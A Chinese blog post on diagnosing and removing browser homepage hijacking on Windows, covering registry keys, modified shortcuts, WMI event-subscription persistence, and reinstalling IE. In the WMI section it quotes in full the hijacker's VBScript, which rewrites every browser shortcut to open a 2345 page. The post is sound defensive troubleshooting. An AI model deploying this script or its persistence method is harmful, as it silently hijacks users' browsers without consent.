IE浏览器主页被劫持,如何解决主页被篡改问题?

时间:2022-07-25
本文章向大家介绍IE浏览器主页被劫持,如何解决主页被篡改问题?,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

前几天号主的电脑的指纹解锁功能突然不能用了,号主以为是驱动没更新到最新版导致的,去官网下载最新的驱动都安装上了也是不行,后面找Dell客服两个小时也没有找到最终的问题,后面个人怀疑是因为号主研究虚拟化技术导致一些冲突从而指纹识别不能用了,最后一不做二不休直接重置了系统后就恢复了【建议大家把桌面文件属性修改为存到别的盘符,这样就算你重置了系统,桌面的资料都不会丢失。

最后当我打开IE浏览器,居然发现IE浏览器被2345劫持了,无论怎么修改都无法恢复。经过各种的查询与排查,最后终于把它解决掉了,在这里写一下自己处理这个的一些办法,以供后续有浏览器主页被劫持的小伙伴借鉴。

内容简介:

我们在各种网站,浏览各种网页的情况如果缺少防护的话就会使得自己安装的一些软件受到不同程度的篡改,其中浏览器被篡改的情况最为严重。这种情况特别让人抓狂,尽管自己并没有下载一些什么流氓软件,但是主页还是被硬生生地劫持了。每次点开后的主页是2345等这样的链接,紧接着它会跳向这个链接。

一般情况下,浏览器主页被篡改的情况分为三种:

1、注册表篡改IE浏览器

2、浏览器快捷方式篡改(浏览器主页被恶意锁定)

3、注册表篡改三方浏览器

废话不多说,直接进入今天的正题:如何去解决掉它呢?

解决办法:【以IE浏览器为例】

首先我们需要去查看我们的电脑的本身的注册表是否有被修改:

查看注册表信息有没有被修改,如没有被修改,则非此种类型,跳过此种方法。

1、注册表查看

以下部分内容来源:http://www.baiwanzhan.com/site/t128119/

1)IE默认连接首页被修改

受到更改的注册表项目为:

本地:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page

当前用户:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page

通过修改“Start Page”的键值,来达到修改浏览者IE默认连接首页的目的,如浏览“万花谷”就会将你的IE默认连接首页修改为“www.86722.com ”,即便是出于给自己的主页做广告的目的,也显得太霸道了一些,这也是这类网页惹人厌恶的原因。

解决办法:

在Windows启动后,点击“开始”→“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;展开注册表到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Start Page”双击 ,将Start Page的键值改为“about:blank”即可;同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main

在右半部分窗口中找到串值“Start Page”,然后按②中所述方法处理。

退出注册表编辑器,重新启动计算机,一切OK了!

特殊例子:当IE的起始页变成了某些网址后,就算你通过选项设置修改好了,重启以后又会变成他们的网址。其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。

解决办法:

运行注册表编辑器regedit.exe,然后依次展开

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run主键,然后将其下的registry.exe子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页就好了。

2)、篡改IE的默认页

有些IE被改了起始页后,即使设置了“使用默认页”仍然无效,这是因为IE起始页的默认页也被篡改啦。具体说来就是以下注册表项被修改:

HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL“Default_Page_URL”这个子键的键值即起始页的默认页。

解决办法:

运行注册表编辑器,然后展开上述子键,将“Default_Page_UR”子键的键值中的那些篡改网站的网址改掉就好了,或者设置为IE的默认值。

3)、修改IE浏览器缺省主页,并且锁定设置项,禁止用户更改回来。

主要是修改了注册表中IE设置的下面这些键值(DWORD值为1时为不可选):

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Pan

el]\"Settings\"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel]\"Links\"=dword:1

[HKEY_CURRENT_USER\Software\Policies\Microsoft\InternetExplorer\Control Panel]\"SecAddSites\"=dword:1

解决办法:

将上面这些DWORD值改为“0”即可恢复功能。

4)、IE的默认首页灰色按扭不可选

这是由于注册表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel下的DWORD值“homepage”的键值被修改的缘故。原来的键值为“0”,被修改为“ 1”(即为灰色不可选状态)。

解决办法:

将“homepage”的键值改为“0”或者删除这个项即可。

以上部分内容来源:http://www.baiwanzhan.com/site/t128119/

2、exe程序快捷方式查看

此种则是通过修改exe程序的快捷方式来实现锁定主页的,我们可以通过Everything软件查找电脑里存在的exe程序的快捷方式的位置,然后去定位查看是够被修改。

当然,我们也可以在桌面快捷方式鼠标右键查看属性,之后也可以定位此程序所处位置,然后观察其快捷方式属性是否被修改过。

看这里是否修改为浏览器劫持的主页,如果有,把后面链接删除或者修改为你需要设置的主页(注意链接前面有一个空格,格式:后接一个空格键,然后再输入需要设置的主页链接),比如号主设置的默认是搜狗:https://www.sogou.com/

这样也可以间接的锁定你的主页,从而达到劫持主页的目的。当然你设置为你需要的主页后,再次点击打开后就会是你需要设置的主页了。当然建议修改属性时请把原来位置以及程序所在位置的快捷方式删除,然后自己重新创建程序快捷方式,这样比较稳妥!

这种劫持主页还算是轻度的了,还有比这更厉害的,请看下面。

3、WMI主页劫持

以下内容来源:懒得勤快博客:https://masuit.com/1328

中国特色的流氓软件,让我们防不胜防,有时候我们就算再小心,也会有翻车的时候,一不小心就被劫持了所有浏览器的首页,怎么改都无济于事,无奈之下就只有重装系统来解决了,这不,博主(懒得勤快)最近也翻车了,被2345劫持了首页,又不想装系统,于是到处寻找解决方案,终于找到了这个工具来解决这个问题,现在这些流氓软件商的手段可真的是丧心病狂啊。

WMI 是什么,它能帮我做什么?

Windows 管理规范(Windows Management Instrumentation)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机。WMI 通过编程和脚本语言为日常管理提供了一条连续一致的途径。例如,用户可以:

(1)在远程计算机器上启动一个进程。

(2)设定一个在特定日期和时间运行的进程。

(3)远程启动计算机。

(4)获得本地或远程计算机的已安装程序列表。

(5)查询本地或远程计算机的 Windows 事件日志

WMI主页劫持

WMI主页劫持非常隐蔽,一般的方法很难找到罪魁祸首,没有运行进程,后台定时运行,即使手动修改回来,过一段时间所有的浏览器快捷方式都添加了推广主页链接。

WMI主页劫持方法:

使用WMITools处理:

WMITools工具:
https://590m.com/file/21430834-461799233

安装WMITools后,右键WMI Event Viewer,管理员运行,点击钢笔图标

一直确认

在右侧选中后右击 -> 选择view instant properties

On Error Resume Next:Const link = "http://www.2345.com/?v=1030":Const link360 = "http://www.2345.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:UsersPublicDesktop,C:ProgramDataMicrosoftWindowsStart MenuPrograms,C:UsersAdministratorDesktop,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick Launch,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedStartMenu,C:UsersAdministratorAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBar,C:UsersAdministratorAppDataRoamingMicrosoftWindowsStart MenuPrograms":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上2345的网址(总算把你揪出来了,藏得够深的)

受到影响的浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下:

"114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

最后,右键__EventFilter,选择Delete instance

后面号主发现这个好像不太全,补上:

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“rootsubscription”,确定,出现下图:

点击左侧_EventFilter:Name=“unown_filter”,再至右侧右键点击ActiveScriptEventConsumer Name=“unown”,选择view instant properties,如下图:

最后,右键__EventFilter,选择Delete instance

以上内容来源:懒得勤快博客:https://masuit.com/1328

4、其他方法

号主当时搜了不少办法,有说使用360等工具去锁定主页从而防止主页被篡改的发生,其实吧,在号主看来,这无非就是是用一个无赖赶走了一个流氓,从根本上根本解决不了问题,嗯,就说这么多,大家应该都懂

~~后面会给你一大堆惊喜的。

号主此次被劫持的号主以上方法都看了,很不幸,都不是

,后面用exe解析程序直接查看IE的主程序,貌似瞥见了一丝2345的影子,大概是修改了这里吧,也有大致可能修改了dll文件。最后我直接将IE浏览器重新卸载功能再重新安装就解决了主页被劫持的问题。

大致给大家描述一下被劫持的现象:

1)打开浏览器自动跳转2345导航,主页跟着一堆广告~~

2)通过Internet选项修改锁定主页无法锁定,即使点了确认以后再次回来还是锁定的2345,注册表看了没有被修改,WMI也看了没有相应的脚本。

解决办法:

卸载IE浏览器之后再重新安装,请注意这里是卸载,而不是重新覆盖安装,即使你有IE安装包,覆盖安装是解决不了的。其他浏览器也是如此,建议卸载后再安装,IE是系统自带,卸载并不是普通的卸载方法。建议如果是其他的浏览器的话,建议用Uninstall Tools之类的去卸载比较完全,可以达到不残留。

IE浏览器卸载方法:

打开控制器面板:

win+r : 输入control,Enter即可

或者右键桌面电脑图标,退回控制面板即可。

亦或者桌面右键,个性化——主题——桌面图标管理添加即可:

之后,会提示重启电脑,确认即可,最后我们再按同样的方法将IE浏览器安装回来即可恢复,号主的劫持问题是如此解决的。

注意:其他浏览器请勿覆盖安装,覆盖安装肯定是解决不了的。

5、终极方法【重装系统】

如果都解决不了的话,这也可能是最终能够处理的办法了。能接受重装系统的小伙伴可以采用此方法,重装系统前请先做好自己资料的备份,比如桌面文件以及C盘的下载文件夹下内容和QQ、微信等下载文件的备份。此外,建议重装系统使用系统自带系统【官方自带工具亦可】恢复进行重装,这样不会导致无法联网激活。

推荐阅读此篇文章:

C盘(系统盘)磁盘剩余容量告警?如何解决与预防,C盘容量告急解决方法简单汇总!

如果接受不了重装系统,且以上办法都处理不了的话,建议使用以下方法:

自行新建快捷方式,修改属性。前面有介绍过:

最后,我们可以给劫持的主页网址添加黑名单

以上内容就是今天的内容,希望小伙伴们遇到都可以找到原因并处理掉,是什么具体导致被劫持的还需要大家自行排查

随机文章
本站知识点必读
最近更新